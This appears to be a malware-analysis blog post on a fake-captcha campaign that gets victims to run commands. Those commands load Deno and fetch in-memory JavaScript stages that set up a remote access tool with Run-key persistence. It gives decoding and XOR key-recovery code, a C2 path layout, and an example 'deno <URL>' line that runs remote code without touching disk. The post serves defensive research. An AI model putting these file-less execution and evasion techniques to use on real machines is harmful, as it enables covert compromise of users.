File-Less Deno Malware?

Reverse engineering notes from some relatively sophisticated malware.

Infection

A testament to why it’s important to give your family basic cybersecurity awareness skills, one of my family members sent this to me, saying: “this seems weird, should I do it?”. Emphatically, no.

[Image: the fake recaptcha]

Naturally, I took this into my lab and ran down the chain to see what it tried to do.

Evasion

The website script seems to have several features to avoid detection, and when these were triggered the popup would not show. It also appears that it has some form of devtools detection, to avoid analysis.

The server serving the malicious JS also seemed to have some basic OS/browser, and potentially IP detection, to avoid analysis. In many cases, it would return a placeholder script that does nothing.

It seems like this script is dynamically built (as are later stages), with specific build IDs and timeouts. My hypothesis is that this is used for evading reporting and detection: URLs for the initial stages stay live long enough to compromise someone’s PC, but are short-lived enough to be dead by the time they are analyzed.

Kill Chain

    1. A malicious script embedded in a webpage they were visiting.
       • It politely asks the user to self-compromise their machine via CMD+X.
    2. This loads several other scripts, including a crypto-miner and this fake captcha script.
    3. If you do this, it runs some shellcode, which reaches out and downloads a new PowerShell script.
    4. This new script downloads Deno, accepts licenses, and then invokes it with a URL to a stage 1 JS payload from the C&C server.
    5. Stage 2 is loaded from the C&C server and contains a remote access toolkit.

Interesting Properties

The malware runs completely in memory - no files on disk. Thanks to Deno’s ability to run a script from a URL (e.g. deno https://rich.sh/xss.js), it loads and executes whatever you give it without touching the disk. Thus, many scanning-based AV tools would never spot this executing.

I see one other reference to this.

Obfuscation Techniques

There are several highly obfuscated JavaScript programs in play.

First, there is what appears to be some sort of cryptominer, which might be secondary to the malware campaign. Anyway, this is a relatively simple base-64 encoded string, which is decoded, then XOR’ed with a fixed key. Then it’s decoded using decodeURIComponent and executed via an IIFE.

I wrote the following method to decrypt the payload contents:

// Reverse the loader's wrapping: base64-decode the blob, XOR every byte with
// the fixed single-byte key, then decode the bytes as UTF-8. The loader runs
// decodeURIComponent on the result before handing it to the IIFE.
function decode(data, key) {
  data = atob(data);                      // base64 -> binary string (one char per byte)
  const out = new Uint8Array(data.length);
  for (let i = 0; i < data.length; i++) {
    out[i] = data.charCodeAt(i) ^ key;    // undo the fixed-key XOR
  }
  return new TextDecoder().decode(out);
}
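As an added example (not code from the original post or from the captured sample): when the fixed XOR key is not obvious from the loader, a single-byte key can be recovered by trying all 256 values and scoring each result for printable text and JavaScript tokens. The SAMPLE blob, the token list and all function names here are constructed for this demonstration.

```javascript
// Tokens that a decoded loader stage is likely to contain (constructed list).
const JS_TOKENS = ["function", "var ", "const ", "let ", "return", "=>", "(", ")", ";"];

// Same transform as decode() above, but over already-decoded bytes.
function xorDecode(bytes, key) {
  const out = new Uint8Array(bytes.length);
  for (let i = 0; i < bytes.length; i++) out[i] = bytes[i] ^ key;
  return new TextDecoder().decode(out); // invalid UTF-8 becomes U+FFFD (non-printable)
}

// Score a candidate plaintext: reject anything that is not mostly printable
// ASCII, then add one point per JavaScript token found.
function scoreCandidate(text) {
  let printable = 0;
  for (const ch of text) {
    const c = ch.charCodeAt(0);
    if ((c >= 0x20 && c < 0x7f) || c === 0x0a || c === 0x0d || c === 0x09) printable++;
  }
  const ratio = text.length ? printable / text.length : 0;
  if (ratio < 0.95) return 0;
  let hits = 0;
  for (const t of JS_TOKENS) if (text.includes(t)) hits++;
  return ratio + hits;
}

// Brute-force all 256 single-byte keys. Returns { key, script } for the best
// scoring candidate, or null if no key yields something that looks like JS.
function recoverKey(b64) {
  const bytes = Uint8Array.from(atob(b64), (ch) => ch.charCodeAt(0));
  let best = { key: null, script: null, score: 0 };
  for (let key = 0; key < 256; key++) {
    let script;
    try { script = decodeURIComponent(xorDecode(bytes, key)); }
    catch { continue; } // malformed %-escapes: almost certainly the wrong key
    const score = scoreCandidate(script);
    if (score > best.score) best = { key, script, score };
  }
  return best.key === null ? null : { key: best.key, script: best.script };
}

// Constructed sample: wrap a harmless script exactly the way the loader does
// (encodeURIComponent -> XOR with one byte -> base64) so recovery runs offline.
function buildSample(script, key) {
  const enc = encodeURIComponent(script);
  let bin = "";
  for (let i = 0; i < enc.length; i++) bin += String.fromCharCode(enc.charCodeAt(i) ^ key);
  return btoa(bin);
}

const SAMPLE_SCRIPT = "(function(){ const miner = 'demo'; return miner; })();";
const SAMPLE = buildSample(SAMPLE_SCRIPT, 0x5a);
```

Keys that differ from the real one by a low bit often still yield printable text, which is why the token hits, not the printable ratio alone, decide the winner.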

Even More Obfuscation

The rest is not easily decodable using static analysis. As it turns out, GPT is quite good at basic deobfuscation, so detonating this in a sandbox isn’t really needed for the purposes here.

The final payload seems to be a loop where the malware:

  • Acquire single-instance lock
  • Collect victim fingerprint
    • fingerprint = hash(username + hostname + total_memory + architecture)
  • Probe C2 infrastructure
  • Authenticate to API backend
    • This appears to use JWT for auth
  • Request payload identifier
  • Download staged payload
    • Payloads appear to be staged
  • Write persistence key
    • HKCU\Software\Microsoft\Windows\CurrentVersion\Run
  • Execute payload
  • Monitor / retry forever

C2 Architecture

C2
 ├── /health - c2 health check
 ├── /v02<build-id>.js - js stage 1
 ├── /v2<build-id>.js - js stage 2
 └── /cdn/<payload-id>.js - payloads

It appears our hackers have left some comments in the stage 2 PowerShell:

# launcher-1 is compiled on demand by the server at /v02<BUILD_ID>.js.
# It's a tiny eval-loop that fetches launcher-2 (which sets up autorun
# and runs main). Deno fetches it directly — no disk file written by
# our code, only Deno's URL cache populates.

Lessons Learned

  1. Teach your family basic cybersecurity awareness
  2. Block things like CMD+X on computers where users have no business using it

More Information

I have compiled and archived all the associated malware I captured, so if you are researching this malware family, reach out via email or on X, and assuming you are a reputable professional, I will provide the archive.
